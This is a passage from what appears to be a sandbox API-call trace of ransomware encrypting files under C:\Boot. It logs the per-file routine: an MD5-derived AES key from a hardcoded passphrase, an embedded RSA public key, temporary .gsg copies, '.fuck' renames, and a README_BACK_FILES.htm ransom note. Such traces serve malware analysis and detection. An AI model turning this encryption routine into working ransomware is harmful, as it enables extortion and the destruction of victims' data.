(lpExistingFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.fuck")) returned 0 [0231.368] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.369] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.369] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.369] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.369] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.369] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.369] GetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\et-ee\\readme_back_files.htm")) returned 0x20 [0231.369] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.369] FindFirstFileA (in: lpFileName="C:\\\\Boot\\fi-FI\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394be8 [0231.372] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.372] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.372] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.372] GetLastError () returned 0x12 [0231.372] GetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0231.373] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.373] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.373] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.373] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.374] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.376] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.376] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.376] CryptHashData (hHash=0x3949a8, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.376] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x3949a8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.376] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.376] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.376] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b038) returned 1 [0231.377] CryptImportPublicKeyInfo (in: hCryptProv=0x275b038, dwCertEncodingType=0x1, pInfo=0x27602b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27602e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27602e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3945a8) returned 1 [0231.377] CryptEncrypt (in: hKey=0x3945a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.377] CryptEncrypt (in: hKey=0x3945a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b148*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b148*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.377] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b148, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.377] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d2a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276d2a0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.377] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d2a0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276d2a0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.377] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d2a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.377] CloseHandle (hObject=0xffffffff) returned 1 [0231.377] CloseHandle (hObject=0xffffffff) returned 1 [0231.377] CopyFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.378] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.378] DeleteFileA (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.gsg")) returned 0 [0231.378] MoveFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.fuck")) returned 0 [0231.378] CryptDestroyHash (hHash=0x3949a8) returned 1 [0231.378] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.378] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.378] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.378] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.378] GetLastError () returned 0x5 [0231.379] GetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui")) returned 0x20 [0231.379] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.379] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.379] CreateFileA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.379] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.379] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.382] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.382] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.382] CryptHashData (hHash=0x3949a8, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.382] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x3949a8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.382] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.382] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.382] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276bb30) returned 1 [0231.382] CryptImportPublicKeyInfo (in: hCryptProv=0x276bb30, dwCertEncodingType=0x1, pInfo=0x2760040*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760070*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760078*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x393f28) returned 1 [0231.382] CryptEncrypt (in: hKey=0x393f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.382] CryptEncrypt (in: hKey=0x393f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b888*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b888*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.383] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b888, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.383] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276d6a0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.383] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d6a0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276d6a0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.383] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.383] CloseHandle (hObject=0xffffffff) returned 1 [0231.383] CloseHandle (hObject=0xffffffff) returned 1 [0231.383] CopyFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.383] SetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.383] DeleteFileA (lpFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.gsg")) returned 0 [0231.384] MoveFileA (lpExistingFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\fi-FI\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.fuck")) returned 0 [0231.384] CryptDestroyHash (hHash=0x3949a8) returned 1 [0231.384] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.384] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.384] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.384] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.384] FindClose (in: hFindFile=0x394be8 | out: hFindFile=0x394be8) returned 1 [0231.384] GetFileAttributesA (lpFileName="C:\\\\Boot\\fi-FI\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fi-fi\\readme_back_files.htm")) returned 0x20 [0231.384] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.384] FindFirstFileA (in: lpFileName="C:\\\\Boot\\Fonts\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.386] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.386] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.386] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.386] GetLastError () returned 0x12 [0231.386] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0231.387] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.387] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.387] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.388] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.388] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b998) returned 1 [0231.390] CryptCreateHash (in: hProv=0x276b998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.390] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.390] CryptHashData (hHash=0x394a68, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.390] CryptDeriveKey (in: hProv=0x276b998, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.390] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.390] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.390] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b558) returned 1 [0231.390] CryptImportPublicKeyInfo (in: hCryptProv=0x276b558, dwCertEncodingType=0x1, pInfo=0x2760380*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27603b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27603b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394528) returned 1 [0231.390] CryptEncrypt (in: hKey=0x394528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.390] CryptEncrypt (in: hKey=0x394528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276c108*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276c108*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.390] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276c108, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.390] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276dea8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276dea8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.390] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276dea8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276dea8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.390] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276dea8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.390] CloseHandle (hObject=0xffffffff) returned 1 [0231.391] CloseHandle (hObject=0xffffffff) returned 1 [0231.391] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), bFailIfExists=0) returned 0 [0231.391] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.391] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.gsg")) returned 0 [0231.391] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.fuck")) returned 0 [0231.391] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.391] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.391] CryptReleaseContext (hProv=0x276b998, dwFlags=0x0) returned 1 [0231.391] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.392] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.392] GetLastError () returned 0x5 [0231.392] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0231.393] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.393] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.393] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.394] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.394] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b910) returned 1 [0231.395] CryptCreateHash (in: hProv=0x276b910, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.395] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.395] CryptHashData (hHash=0x394a68, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.395] CryptDeriveKey (in: hProv=0x276b910, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.396] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.396] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.396] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276c190) returned 1 [0231.396] CryptImportPublicKeyInfo (in: hCryptProv=0x276c190, dwCertEncodingType=0x1, pInfo=0x2760450*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760480*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760488*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394568) returned 1 [0231.396] CryptEncrypt (in: hKey=0x394568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.396] CryptEncrypt (in: hKey=0x394568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276bee8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276bee8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.396] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276bee8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.396] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276dea8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276dea8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.396] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276dea8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276dea8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.396] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276dea8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.396] CloseHandle (hObject=0xffffffff) returned 1 [0231.396] CloseHandle (hObject=0xffffffff) returned 1 [0231.396] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), bFailIfExists=0) returned 0 [0231.397] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x0) 